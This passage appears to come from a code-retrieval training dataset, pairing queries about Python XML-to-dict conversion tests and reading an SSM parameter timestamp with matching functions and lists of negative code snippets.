"def test_xmlparser_serialiser(self):\n\n sampletext = \"\"\"<root>\n <doc><name>\"Guido Rossum\"</name><address> \"88 Palo Alto\"</address><phone> \"776985411\"</phone></doc>\n <doc><name>\"John Smith\"</name><address> \"38 Driver Avenue\"</address><phone> \"091234567\"</phone></doc>\n <doc><name>\"Jane Doe\"</name><address> \"17 Waine Street\"</address><phone> \"0494512390\"</phone></doc>\n</root>\n\"\"\" \n self.assertEqual(self.xmlo.serialise(\"./test_input.txt\"), sampletext)\n\n return"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
test conversion of dict to xml string
|
def test_dict_to_xml(self):
expected = self.xml
result = convert.dict_to_xml(self.data)
self.assertEqual(expected, result)
|
[
"def test_xmldict(self):\n xml = self.xml_data\n from_string = xmldict.xml_to_dict(xml)\n\n d = {'contact': {'fname': 'Joe', 'lname': 'Smith'},\n 'query': {'field': 'ass', 'where': 'ass'}}\n\n from_dict = xmldict.dict_to_xml(d)\n\n # print the dict created from xml string\n termprint('INFO', from_string)\n\n # print the xml string created from dict\n termprint('WARNING', from_dict)",
"def dict_to_xml(tag, d):\r\n elem = Element(tag)\r\n for key, val in d.items():\r\n child = Element(key)\r\n child.text = str(val)\r\n elem.append(child)\r\n return elem",
"def ConvertDictToXml(xmldict):\r\n\r\n roottag = list(xmldict)[0]\r\n root = ElementTree.Element(roottag)\r\n _ConvertDictToXmlRecurse(root, xmldict[roottag])\r\n\r\n return ElementTree.tostring(root)",
"def convert_dict_to_xml(xmldict):\n\n roottag = xmldict.keys()[0]\n root = ETree.Element(roottag)\n _convert_dict_to_xml_recurse(root, xmldict[roottag])\n return root",
"def test_empty_dict_to_str(self):\n s = msgmap.dict_to_str(dict())\n self.assertEqual(len(s), 0)",
"def d2xml(d):\n def _d2xml(d, p):\n for k,v in d.items():\n if isinstance(v,dict):\n node = etree.SubElement(p, k)\n _d2xml(v, node)\n elif isinstance(v,list):\n for item in v:\n node = etree.SubElement(p, k)\n _d2xml(item, node)\n elif k == \"__text__\":\n p.text = v\n elif k == \"__tail__\":\n p.tail = v\n else:\n p.set(k, v)\n\n k,v = d.items()[0]\n node = etree.Element(k)\n _d2xml(v, node)\n return node",
"def generateXml(obj):\r\n if isinstance(obj, dict) or isinstance(obj,DictMixin):\r\n return getXML_dict(obj, \"item\")\r\n elif isinstance(obj,collections.Iterable):\r\n return \"<list>%s</list>\" % getXML(obj, \"item\")\r\n else:\r\n raise RuntimeError(\"Unable to convert to XML: %s\" % obj)",
"def d2xml(d):\n def _d2xml(d, p):\n for k,v in d.items():\n if isinstance(v,dict):\n node = etree.SubElement(p, k)\n _d2xml(v, node)\n elif isinstance(v,list):\n for item in v:\n node = etree.SubElement(p, k)\n _d2xml(item, node)\n elif k == \"__text__\":\n p.text = v\n elif k == \"__tail__\":\n p.tail = v\n else:\n p.set(k, v)\n\n key = list(d.keys())[0]\n root = etree.Element(key)\n _d2xml(d[key], root)\n return root",
"def _get_xml_value(value):\n retval = []\n if isinstance(value, dict):\n for key, value in value.items():\n retval.append('<' + xml_escape(text_type(key)) + '>')\n retval.append(_get_xml_value(value))\n retval.append('</' + xml_escape(text_type(key)) + '>')\n elif isinstance(value, list):\n for key, value in enumerate(value):\n retval.append('<child order=\"' + xml_escape(text_type(key)) + '\">')\n retval.append(_get_xml_value(value))\n retval.append('</child>')\n elif isinstance(value, bool):\n retval.append(xml_escape(text_type(value).lower()))\n elif isinstance(value, binary_type):\n retval.append(xml_escape(value.encode('utf-8')))\n elif isinstance(value, text_type):\n retval.append(xml_escape(value))\n else:\n retval.append(xml_escape(text_type(value)))\n return \"\".join(retval)",
"def _dict_to_etree_rec(self, content, tree):\n if type(content) == dict:\n for key, value in content.items():\n e = ElementTree.Element(key)\n self._dict_to_etree_rec(value, e)\n tree.append(e)\n else:\n tree.text = str(content)",
"def map_to_xml(mapping, root=None, command=None):\n envelope = None\n\n if root is None:\n envelope, root = get_envelope(command)\n\n for tag, value in mapping:\n tag = ElementTree.Element(tag)\n\n if type(value) == tuple:\n # Allow for nesting.\n value = map_to_xml(value, tag)\n elif type(value) == list:\n # This conditional lets us expand lists into multiple elements with\n # the same name:\n #\n # ((\"test\", ((\"test_child\", [1, 2, 3]),)),)\n #\n # will be serialized as:\n #\n # <test>\n # <test_child>1</test_child>\n # <test_child>2</test_child>\n # <test_child>3</test_child>\n # </test>\n value_list = tuple((tag.tag, value) for value in value)\n value = map_to_xml(value_list, root)\n continue\n elif type(value) == dict:\n # This conditional expands dicts into name/value pairs, as required\n # by some Silverpop method:\n #\n # ((\"COLUMN\", {\"a\": 1}),)\n #\n # will be serialized as:\n #\n # <COLUMN>\n # <NAME>a</NAME>\n # <VALUE>1</VALUE>\n # </COLUMN>\n value_list = ()\n for column_name, column_value in six.iteritems(value):\n value_list += (((tag.tag), ((\"NAME\", column_name), (\"VALUE\", column_value))),)\n\n value = map_to_xml(value_list, root)\n continue\n\n elif not type(value) == bool:\n # If the value isn't True/False, we can set the node's text value.\n # If the value is True, the tag will still be appended but will be\n # self-closing.\n tag.text = u\"%s\" % (value)\n\n if value:\n root.append(tag)\n\n if envelope is not None:\n root = envelope\n return ElementTree.tostring(root)",
"def json2xml(json_obj: Dict[str, str]) -> str:\n result_list = []\n\n json_obj_type = type(json_obj)\n\n if json_obj_type is dict:\n count = 0\n for tag_name in json_obj:\n sub_obj = json_obj[tag_name]\n result_list.append(\"<entry lxnm:entryID='%s' xmlns:lxnm='http://www.lexonomy.eu/'>\" % (count))\n result_list.append(\"<headword xml:space='preserve'>%s</headword>\" % (tag_name))\n result_list.append('<sense>')\n result_list.append(\"<translation xml:space='preserve'>%s</translation>\" % (str(sub_obj)))\n result_list.append('</sense>')\n result_list.append('</entry>')\n count +=1\n return \"\".join(result_list)\n\n return \"%s%s\" % (json_obj)",
"def _dict_to_etree_rec(self, content, tree):\n if type(content) == dict:\n for key, value in content.items():\n element = ElementTree.Element(key)\n self._dict_to_etree_rec(value, element)\n tree.append(element)\n else:\n tree.text = str(content)",
"def render_xml(self, d):\n\t\tself.set_flag(\"render\", False)\n\t\tself.response.headers[\"Content-Type\"] = \"application/xml\"\n\t\txml_txt = xml.dicttoxml(d)\n\t\tself.response.out.write(xml_txt)",
"def to_xmls (foo, indent = 1):\n if type(foo) == type({}):\n return __print_dict(foo, indent)\n elif type(foo) == type([]) or type(foo) == type(()):\n return __print_list(foo, indent)\n else:\n return __print_scalar(foo, indent)",
"def test_to_xml(self):\n composer = Composer(TextType(\"Henry Mancini\"))\n expected = \"\"\"<composer name=\"Henry Mancini\"/>\"\"\"\n self.assertEqual(expected, composer.to_xml())",
"def save_xml(dictionary, path_to_save, encoding=\"utf8\"):\n def text_xml(dictionary, level=0):\n text = \"\"\n tags = list(dictionary.keys())\n keys = []\n for i in range(len(tags)): # Run through the dictionary\n if type(dictionary[tags[i]]) is str or dictionary[tags[i]] is None:\n keys.append(tags[i]) # Add <tag>value</tag> or <tag/> tags first\n for i in range(len(tags)):\n if not (type(dictionary[tags[i]]) is str or dictionary[tags[i]] is None):\n keys.append(tags[i]) # Add complex tags (dictionary, list) at the end\n\n for key in keys:\n if dictionary[key] is None or dictionary[key] == '':\n text += level * '\\t'\n text += \"<{}/>\\n\".format(key)\n elif type(dictionary[key]) is str:\n text += level * '\\t'\n text += \"<{}>{}</{}>\\n\".format(key, dictionary[key], key)\n elif type(dictionary[key]) is XmlDict or type(dictionary[key]) is dict:\n text += level * '\\t'\n text += \"<{}>\\n{}{}</{}>\\n\".format(key, text_xml(dictionary[key], level + 1), level * '\\t', key)\n elif type(dictionary[key]) is list:\n content = [\"{}<{}>\\n{}{}</{}>\\n\".format(level * '\\t', key,\n text_xml(dictionary[key][i], level + 1),\n level * '\\t', key) for i in range(len(dictionary[key]))]\n text += ''.join(content)\n return text\n\n with open(path_to_save, encoding=encoding, mode='w') as file:\n text = text_xml(dictionary)\n file.write('<?xml version=\"1.0\" encoding=\"UTF-8\"?>\\n')\n file.write(text)\n file.close()",
"def test_string_roundtrip(self):\n block = self.create_block(\"leafwithdictandlist\")\n\n expected_seq = [b'1', b'2']\n expected_dict = {b'1': b'1', b'ping': b'ack'}\n block.sequence = expected_seq\n block.dictionary = expected_dict\n self.assertRaises(TypeError, self.export_xml_for_block, block)",
"def jsonp2xml(json):\n ret = \"\"\n content = None\n for c in [str, int, unicode]:\n if isinstance(json, c):\n return str(json)\n if not isinstance(json, dict):\n raise Exception(\"class type: %s\" % json)\n\n # every tag is a dict.\n # its value can be a string, a list or a dict\n for tag in json.keys():\n tag_list = json[tag]\n\n # if tag_list is a list, then it represent a list of elements\n # ex. {index: [{ 'a':'1'} , {'a':'2'} ] }\n # --> <index a=\"1\" /> <index b=\"2\" />\n if isinstance(tag_list, list):\n for t in tag_list:\n # for every element, get the attributes\n # and embed them in the tag named\n attributes = \"\"\n content = \"\"\n if not isinstance(t, dict):\n ret += \"%s\" % t\n else:\n for (attr, value) in t.iteritems():\n # only serializable values are attributes\n if value.__class__.__name__ in 'str':\n attributes = \"\"\"%s %s=\"%s\" \"\"\" % (\n attributes,\n attr,\n cgi.escape(\n stringutils.to_unicode(value), quote=None)\n )\n elif value.__class__.__name__ in ['int', 'unicode', 'bool', 'long']:\n attributes = \"\"\"%s %s=\"%s\" \"\"\" % (\n attributes, attr, value)\n # other values are content\n elif isinstance(value, dict):\n content += ResponseHelper.jsonp2xml(value)\n elif isinstance(value, list):\n content += ResponseHelper.jsonp2xml(\n {attr: value})\n if content:\n ret += \"<%s%s>%s</%s>\" % (\n tag, attributes, content, tag)\n else:\n ret += \"<%s%s/>\" % (tag, attributes)\n elif isinstance(tag_list, dict):\n attributes = \"\"\n content = \"\"\n\n for (attr, value) in tag_list.iteritems():\n # only string values are attributes\n if not isinstance(value, dict) and not isinstance(value, list):\n attributes = \"\"\"%s %s=\"%s\" \"\"\" % (\n attributes, attr, value)\n else:\n content += ResponseHelper.jsonp2xml({attr: value})\n if content:\n ret += \"<%s%s>%s</%s>\" % (tag, attributes, content, tag)\n else:\n ret += \"<%s%s/>\" % (tag, attributes)\n\n # Log the source and destination of the response\n ResponseHelper.log.debug(\"ret object is %s\" % ret.__class__)\n if dump_response:\n ResponseHelper.log.debug(\n \"\\n\\njsonp2xml: %s\\n--->\\n%s \\n\\n\" % (json, ret))\n\n return ret.replace(\"isDir=\\\"True\\\"\", \"isDir=\\\"true\\\"\")",
"def test_xml_exist(xml_parser):\n\n xml_data = xml_parser()\n assert xml_data.get_dict()"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
test xml > dict > xml
|
def test_xml_reconvert(self):
_dict = convert.xml_to_dict(self.xml)
result = convert.dict_to_xml(_dict)
expected = self.xml
self.assertEqual(expected, result)
|
[
"def test_xmldict(self):\n xml = self.xml_data\n from_string = xmldict.xml_to_dict(xml)\n\n d = {'contact': {'fname': 'Joe', 'lname': 'Smith'},\n 'query': {'field': 'ass', 'where': 'ass'}}\n\n from_dict = xmldict.dict_to_xml(d)\n\n # print the dict created from xml string\n termprint('INFO', from_string)\n\n # print the xml string created from dict\n termprint('WARNING', from_dict)",
"def test_xml_exist(xml_parser):\n\n xml_data = xml_parser()\n assert xml_data.get_dict()",
"def test_xmlparser_serialiser(self):\n\n sampletext = \"\"\"<root>\n <doc><name>\"Guido Rossum\"</name><address> \"88 Palo Alto\"</address><phone> \"776985411\"</phone></doc>\n <doc><name>\"John Smith\"</name><address> \"38 Driver Avenue\"</address><phone> \"091234567\"</phone></doc>\n <doc><name>\"Jane Doe\"</name><address> \"17 Waine Street\"</address><phone> \"0494512390\"</phone></doc>\n</root>\n\"\"\" \n self.assertEqual(self.xmlo.serialise(\"./test_input.txt\"), sampletext)\n\n return",
"def test_xml_data_parser(self):\n data = utils.xml_data_parser()\n self.assertIsInstance(data, dict)\n self.assertIsInstance(data.keys()[0], int)\n self.assertEqual(\n data[141], {\n 'name': 'Adam P.',\n 'avatar': 'https://intranet.stxnext.pl/api/images/users/141'\n }\n )",
"def test_export_xml(self):\n pass",
"def test_read_xml_string_to_dict_for_staff(self):\n staff_output = {}\n staff_tag = None\n for element, tag in read_xml_string(self.xml_string, records_tag=['staff'], to_dict=True):\n staff_output = element\n staff_tag = tag\n\n self.assertDictEqual(staff_output, self.expected_output)\n self.assertEqual(staff_tag, 'staff')",
"def test_xmlparser_deserialiser(self):\n sampletext = '\"Guido Rossum\", \"88 Palo Alto\", \"776985411\"' \n self.assertEqual(self.xmlo.deserialise(\"./test_input.xml\")[0].csv(), sampletext)\n return",
"def test_format_experiment_xml(self):\n with open('./tests/mocks/experiment.xml') as experiment:\n experiment = xmltodict.parse(experiment.read())\n\n xml_library = create_xml_library(\n 'Blood', 'b2b0c9ad-1292-43cd-aeed-6b492e67252d', 'Illumina NovaSeq 5000',\n 'd41d8cd98f00b204e9800998ecf8427e', '100, 100', 'GRCh37/hg19', 'e40d8f23-2f59-49b7-bb78-bf9fecc1beeb',\n SECRET, 2, 'b2b0c9ad-1292-43cd-aeed-6b492e67252d.bam')\n\n result = xmltodict.parse(etree.tostring(format_experiment_xml(xml_library)))\n\n self.assertEqual(len(result['EXPERIMENT_SET']), len(experiment['EXPERIMENT_SET']))\n self.assertEqual(len(result['EXPERIMENT_SET']['EXPERIMENT']), len(experiment['EXPERIMENT_SET']['EXPERIMENT']))\n\n result_identifiers = result['EXPERIMENT_SET']['EXPERIMENT']['IDENTIFIERS']\n experiment_identifiers = experiment['EXPERIMENT_SET']['EXPERIMENT']['IDENTIFIERS']\n\n self.assertEqual(len(result_identifiers), len(experiment_identifiers))\n self.assertEqual(\n result_identifiers['SUBMITTER_ID']['@namespace'], experiment_identifiers['SUBMITTER_ID']['@namespace'])\n self.assertEqual(result_identifiers['SUBMITTER_ID']['#text'], experiment_identifiers['SUBMITTER_ID']['#text'])\n\n self.assertEqual(\n result['EXPERIMENT_SET']['EXPERIMENT']['TITLE'], experiment['EXPERIMENT_SET']['EXPERIMENT']['TITLE'])\n\n self.assertEqual(\n result['EXPERIMENT_SET']['EXPERIMENT']['STUDY_REF']['@accession'],\n experiment['EXPERIMENT_SET']['EXPERIMENT']['STUDY_REF']['@accession'])\n\n result_design = result['EXPERIMENT_SET']['EXPERIMENT']['DESIGN']\n experiment_design = experiment['EXPERIMENT_SET']['EXPERIMENT']['DESIGN']\n\n self.assertEqual(len(result_design), len(experiment_design))\n self.assertEqual(result_design['DESIGN_DESCRIPTION'], experiment_design['DESIGN_DESCRIPTION'])\n self.assertEqual(\n result_design['SAMPLE_DESCRIPTOR']['@refname'], experiment_design['SAMPLE_DESCRIPTOR']['@refname'])\n self.assertEqual(\n result_design['SAMPLE_DESCRIPTOR']['@refcenter'], experiment_design['SAMPLE_DESCRIPTOR']['@refcenter'])\n\n result_design_library_descriptor = result['EXPERIMENT_SET']['EXPERIMENT']['DESIGN']['LIBRARY_DESCRIPTOR']\n experiment_design_library_descriptor = experiment['EXPERIMENT_SET']['EXPERIMENT']['DESIGN']['LIBRARY_DESCRIPTOR']\n\n self.assertEqual(len(result_design_library_descriptor), len(experiment_design_library_descriptor))\n self.assertEqual(\n result_design_library_descriptor['LIBRARY_NAME'], experiment_design_library_descriptor['LIBRARY_NAME'])\n self.assertEqual(\n result_design_library_descriptor['LIBRARY_STRATEGY'],\n experiment_design_library_descriptor['LIBRARY_STRATEGY'])\n self.assertEqual(\n result_design_library_descriptor['LIBRARY_SOURCE'], experiment_design_library_descriptor['LIBRARY_SOURCE'])\n self.assertEqual(\n result_design_library_descriptor['LIBRARY_SELECTION'],\n experiment_design_library_descriptor['LIBRARY_SELECTION'])\n self.assertEqual(\n result_design_library_descriptor['LIBRARY_LAYOUT'], experiment_design_library_descriptor['LIBRARY_LAYOUT'])\n\n result_design_spot_descriptor = result['EXPERIMENT_SET']['EXPERIMENT']['DESIGN']['SPOT_DESCRIPTOR']\n experiment_design_spot_descriptor = experiment['EXPERIMENT_SET']['EXPERIMENT']['DESIGN']['SPOT_DESCRIPTOR']\n\n self.assertEqual(\n result_design_spot_descriptor['SPOT_DECODE_SPEC']['SPOT_LENGTH'],\n experiment_design_spot_descriptor['SPOT_DECODE_SPEC']['SPOT_LENGTH'])\n\n self.assertEqual(\n result_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][0]['READ_INDEX'],\n 
experiment_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][0]['READ_INDEX'])\n self.assertEqual(\n result_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][0]['READ_CLASS'],\n experiment_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][0]['READ_CLASS'])\n self.assertEqual(\n result_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][0]['READ_TYPE'],\n experiment_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][0]['READ_TYPE'])\n self.assertEqual(\n result_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][0]['BASE_COORD'],\n experiment_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][0]['BASE_COORD'])\n\n self.assertEqual(\n result_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][1]['READ_INDEX'],\n experiment_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][1]['READ_INDEX'])\n self.assertEqual(\n result_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][1]['READ_CLASS'],\n experiment_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][1]['READ_CLASS'])\n self.assertEqual(\n result_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][1]['READ_TYPE'],\n experiment_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][1]['READ_TYPE'])\n self.assertEqual(\n result_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][1]['BASE_COORD'],\n experiment_design_spot_descriptor['SPOT_DECODE_SPEC']['READ_SPEC'][1]['BASE_COORD'])\n\n result_platform = result['EXPERIMENT_SET']['EXPERIMENT']['PLATFORM']\n experiment_platform = experiment['EXPERIMENT_SET']['EXPERIMENT']['PLATFORM']\n\n self.assertEqual(len(result_platform), len(experiment_platform))\n self.assertEqual(\n result_platform['ILLUMINA']['INSTRUMENT_MODEL'], experiment_platform['ILLUMINA']['INSTRUMENT_MODEL'])\n\n result_experiment_attributes = result['EXPERIMENT_SET']['EXPERIMENT']['EXPERIMENT_ATTRIBUTES']\n experiment_experiment_attributes = experiment['EXPERIMENT_SET']['EXPERIMENT']['EXPERIMENT_ATTRIBUTES']\n\n self.assertEqual(len(result_experiment_attributes), len(experiment_experiment_attributes))\n self.assertEqual(\n len(result_experiment_attributes['EXPERIMENT_ATTRIBUTE']),\n len(experiment_experiment_attributes['EXPERIMENT_ATTRIBUTE']))\n self.assertEqual(\n result_experiment_attributes['EXPERIMENT_ATTRIBUTE']['TAG'],\n experiment_experiment_attributes['EXPERIMENT_ATTRIBUTE']['TAG'])\n self.assertEqual(\n result_experiment_attributes['EXPERIMENT_ATTRIBUTE']['VALUE'],\n experiment_experiment_attributes['EXPERIMENT_ATTRIBUTE']['VALUE'])",
"def test_export_xml_to_file(self):\n pass",
"def eval_xml(xml_string):\n result_dict = {}\n provisional_references_dict = {}\n # Parse XML string\n doc = ET.fromstring(xml_string)\n # List containing the relevant tags\n tags = ['doknr', 'ecli', 'gertyp', 'gerort', 'spruchkoerper', 'entsch-datum', 'aktenzeichen', 'doktyp', 'norm', 'vorinstanz', 'gruende', 'entscheidungsgruende', 'identifier', 'sonstlt', 'abwmeinung', 'tatbestand', 'tenor', 'sonstosatz', 'leitsatz', 'titelzeile', 'mitwirkung', 'region']\n tags_translation = {'doknr': 'documentnumber',\n 'ecli': 'ecli',\n 'gertyp': 'court',\n 'gerort': 'courtlocation',\n 'spruchkoerper': 'spruchkoerper',\n 'entsch-datum': 'date',\n 'aktenzeichen': 'filenumber',\n 'doktyp': 'documenttype',\n 'entscheidungsgruende': 'reasonfordecision',\n 'abwmeinung': 'abwmeinung',\n 'sonstosatz': 'miscsentence',\n 'norm': 'norms',\n 'vorinstanz': 'previouscourt',\n 'gruende': 'reasons',\n 'identifier': 'identifier',\n 'sonstlt': 'other',\n 'tatbestand': 'offense',\n 'tenor': 'tenor',\n 'leitsatz': 'keysentence',\n 'titelzeile': 'title',\n 'mitwirkung': 'mitwirkung',\n 'region': 'region'}\n\n # Load each tag into dictionary:\n\n outgoing_references_dict = {} # Contains additional information about where the references are\n outgoing_references_set = set() # Contains only the referenced filenumbers\n for tag in tags:\n tag_array = [] # Contains child-tags\n # Iterate through child tags of a tag:\n for child in doc.find(tag).iter():\n if child.text and child.text.rstrip() != \"\":\n if tag == 'entsch-datum':\n tag_array.append(int(child.text)) # Append child date to array as int\n else:\n tag_array.append(child.text.strip()) # Append child tag to array\n # If the array only contains one element, or the tag doesn't have child-tags,\n # only load that tag into the directory. Array is empty if there is no value inside the tag:\n if len(tag_array) == 1:\n if tag == 'vorinstanz':\n outgoing_references, outgoing_references_set = ref.find_reference(tag_array, outgoing_references_set)\n #outgoing_references_dict.append(outgoing_references)\n outgoing_references_dict[tag] = outgoing_references\n # Enter Data into the correct translated dict entry\n result_dict[tags_translation[tag]] = tag_array[0]\n else:\n # Specific tags require search for references\n # This path also enters any tags that are contained in arrays\n reference_tags = ['gruende', 'tenor', 'entscheidungsgruende', 'tatbestand', 'leitsatz', 'vorinstanz']\n if tag in reference_tags:\n outgoing_references, outgoing_references_set = ref.find_reference(tag_array, outgoing_references_set)\n # outgoing_references_dict.append(outgoing_references)\n outgoing_references_dict[tag] = outgoing_references #todo tags_translation?\n result_dict[tags_translation[tag]] = tag_array\n\n result_dict['keywords'] = []\n result_dict['incoming_count'] = -1\n result_dict['successful'] = \"\"\n\n # build provisional reference-dict for ES that does not contain incoming references yet:\n provisional_references_dict = create_reference_dict(result_dict['filenumber'], outgoing_references_dict, outgoing_references_set, [], result_dict['documentnumber'])\n # ES fields: [ID][filenumber][list outgoing references][set outgoing references][set incoming references]\n # [sum of incoming references]\n\n return result_dict, provisional_references_dict",
"def test_format_submission_xml(self):\n with open('./tests/mocks/submission.xml') as submission:\n submission = xmltodict.parse(submission.read())\n\n xml_library = create_xml_library(\n 'Blood', 'b2b0c9ad-1292-43cd-aeed-6b492e67252d', 'Illumina NovaSeq 5000',\n 'd41d8cd98f00b204e9800998ecf8427e', '100, 100', 'GRCh37/hg19', 'e40d8f23-2f59-49b7-bb78-bf9fecc1beeb',\n SECRET, 2, 'b2b0c9ad-1292-43cd-aeed-6b492e67252d.bam')\n\n result = xmltodict.parse(etree.tostring(format_submission_xml(xml_library)))\n\n self.assertEqual(result['SUBMISSION']['@alias'], submission['SUBMISSION']['@alias'])\n self.assertEqual(result['SUBMISSION']['@center_name'], submission['SUBMISSION']['@center_name'])\n self.assertEqual(\n result['SUBMISSION']['@xsi:noNamespaceSchemaLocation'],\n submission['SUBMISSION']['@xsi:noNamespaceSchemaLocation'])\n self.assertEqual(result['SUBMISSION']['@xmlns:xsi'], submission['SUBMISSION']['@xmlns:xsi'])\n\n result_contacts = result['SUBMISSION']['CONTACTS']\n submission_contacts = submission['SUBMISSION']['CONTACTS']\n\n self.assertEqual(len(result_contacts), len(submission_contacts))\n self.assertEqual(result_contacts['CONTACT'][0]['@name'], submission_contacts['CONTACT'][0]['@name'])\n self.assertEqual(\n result_contacts['CONTACT'][0]['@inform_on_error'], submission_contacts['CONTACT'][0]['@inform_on_error'])\n self.assertEqual(\n result_contacts['CONTACT'][0]['@inform_on_status'], submission_contacts['CONTACT'][0]['@inform_on_status'])\n self.assertEqual(result_contacts['CONTACT'][1]['@name'], submission_contacts['CONTACT'][1]['@name'])\n self.assertEqual(\n result_contacts['CONTACT'][1]['@inform_on_error'], submission_contacts['CONTACT'][1]['@inform_on_error'])\n self.assertEqual(\n result_contacts['CONTACT'][1]['@inform_on_status'], submission_contacts['CONTACT'][1]['@inform_on_status'])\n\n result_actions = result['SUBMISSION']['ACTIONS']\n submission_actions = submission['SUBMISSION']['ACTIONS']\n\n self.assertEqual(len(result_actions), len(submission_actions))\n\n self.assertEqual(\n result_actions['ACTION'][0]['ADD']['@source'], submission_actions['ACTION'][0]['ADD']['@source'])\n self.assertEqual(\n result_actions['ACTION'][0]['ADD']['@schema'], submission_actions['ACTION'][0]['ADD']['@schema'])\n self.assertEqual(\n result_actions['ACTION'][1]['ADD']['@source'], submission_actions['ACTION'][1]['ADD']['@source'])\n self.assertEqual(\n result_actions['ACTION'][1]['ADD']['@schema'], submission_actions['ACTION'][1]['ADD']['@schema'])",
"def map_to_xml(mapping, root=None, command=None):\n envelope = None\n\n if root is None:\n envelope, root = get_envelope(command)\n\n for tag, value in mapping:\n tag = ElementTree.Element(tag)\n\n if type(value) == tuple:\n # Allow for nesting.\n value = map_to_xml(value, tag)\n elif type(value) == list:\n # This conditional lets us expand lists into multiple elements with\n # the same name:\n #\n # ((\"test\", ((\"test_child\", [1, 2, 3]),)),)\n #\n # will be serialized as:\n #\n # <test>\n # <test_child>1</test_child>\n # <test_child>2</test_child>\n # <test_child>3</test_child>\n # </test>\n value_list = tuple((tag.tag, value) for value in value)\n value = map_to_xml(value_list, root)\n continue\n elif type(value) == dict:\n # This conditional expands dicts into name/value pairs, as required\n # by some Silverpop method:\n #\n # ((\"COLUMN\", {\"a\": 1}),)\n #\n # will be serialized as:\n #\n # <COLUMN>\n # <NAME>a</NAME>\n # <VALUE>1</VALUE>\n # </COLUMN>\n value_list = ()\n for column_name, column_value in six.iteritems(value):\n value_list += (((tag.tag), ((\"NAME\", column_name), (\"VALUE\", column_value))),)\n\n value = map_to_xml(value_list, root)\n continue\n\n elif not type(value) == bool:\n # If the value isn't True/False, we can set the node's text value.\n # If the value is True, the tag will still be appended but will be\n # self-closing.\n tag.text = u\"%s\" % (value)\n\n if value:\n root.append(tag)\n\n if envelope is not None:\n root = envelope\n return ElementTree.tostring(root)",
"def test_01_FindXml(self):\r\n self.assertEqual(self.m_xml.root.tag, 'PyHouse', 'Invalid XML - not a PyHouse XML config file')",
"def _dict_to_etree_rec(self, content, tree):\n if type(content) == dict:\n for key, value in content.items():\n e = ElementTree.Element(key)\n self._dict_to_etree_rec(value, e)\n tree.append(e)\n else:\n tree.text = str(content)",
"def ConvertXmlToDict(root, dictclass=XmlDictObject):\r\n\r\n # If a string is passed in, try to open it as a file\r\n if isinstance(root, str):\r\n import io\r\n \r\n root = io.StringIO(root)\r\n root = ElementTree.parse(root).getroot()\r\n elif not ElementTree.iselement(root):\r\n print('Expected ElementTree.Element or file path string')\r\n\r\n return dictclass({root.tag: _ConvertXmlToDictRecurse(root, dictclass)})",
"def _dict_to_etree_rec(self, content, tree):\n if type(content) == dict:\n for key, value in content.items():\n element = ElementTree.Element(key)\n self._dict_to_etree_rec(value, element)\n tree.append(element)\n else:\n tree.text = str(content)",
"def dict_to_xml(tag, d):\r\n elem = Element(tag)\r\n for key, val in d.items():\r\n child = Element(key)\r\n child.text = str(val)\r\n elem.append(child)\r\n return elem",
"def test_read_xml_string_to_dict_for_employees(self):\n employees_output = []\n\n for element, tag in read_xml_string(self.xml_string, records_tag=['employees'], to_dict=True):\n if tag == \"employees\":\n employees_output.append(element['bio'])\n\n self.assertListEqual(employees_output, self.expected_output['operations_department']['employees'])",
"def test_string_roundtrip(self):\n block = self.create_block(\"leafwithdictandlist\")\n\n expected_seq = [b'1', b'2']\n expected_dict = {b'1': b'1', b'ping': b'ack'}\n block.sequence = expected_seq\n block.dictionary = expected_dict\n self.assertRaises(TypeError, self.export_xml_for_block, block)",
"def getxmlfromDictionary(dictionary, xml_element):\n xml_element.set(\"Entropy\", str(dictionary[\"Entropy\"]))\n xml_element.set(\"Classes\", dictionary[\"classification_data\"])\n del dictionary[\"Entropy\"]\n del dictionary[\"classification_data\"]\n if 'classifier' not in dictionary:\n for key in dictionary:\n for i in dictionary[key]:\n elem = ET.SubElement(xml_element, \"node\")\n elem.set(key, i)\n getxmlfromDictionary(dictionary[key][i], elem) \n else:\n xml_element.text = dictionary['classifier']\n return"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
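The three tests above exercise a convert module whose xml_to_dict and dict_to_xml round-trip cleanly. A self-contained sketch of such a pair using only the standard library is below; it is purely illustrative and ignores attributes, repeated tags and mixed content, which the real convert module may handle differently:

import xml.etree.ElementTree as ET

def xml_to_dict(xml_string):
    # Parse an XML string into nested dicts; leaf elements become their text.
    def _node(elem):
        children = list(elem)
        if not children:
            return elem.text or ""
        return {child.tag: _node(child) for child in children}
    root = ET.fromstring(xml_string)
    return {root.tag: _node(root)}

def dict_to_xml(data):
    # Rebuild an XML string from a single-rooted nested dict.
    def _build(tag, value):
        elem = ET.Element(tag)
        if isinstance(value, dict):
            for key, val in value.items():
                elem.append(_build(key, val))
        else:
            elem.text = str(value)
        return elem
    (tag, value), = data.items()  # expect exactly one root key
    return ET.tostring(_build(tag, value), encoding="unicode")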
Get the timestamp currently stored in the SSM parameter.
|
def get_timestamp(self):
param = self.client.get_parameter(Name=self.param_name)
timestamp = param['Parameter']['Value']
return timestamp
|
[
"def timestamp(self) -> datetime:\n return self.context['embryo'].get('timestamp')",
"def _get_timestamp(self):\n return datetime.datetime.now()",
"def timestamp(self) -> Decimal:\n return self.__dict__[\"timestamp\"]",
"def timestamp(self) -> int:\n return self.summary[\"timestamp\"]",
"def timestamp(self):\n if self.service.backtesting:\n return self._timestamp\n else:\n return time.time()",
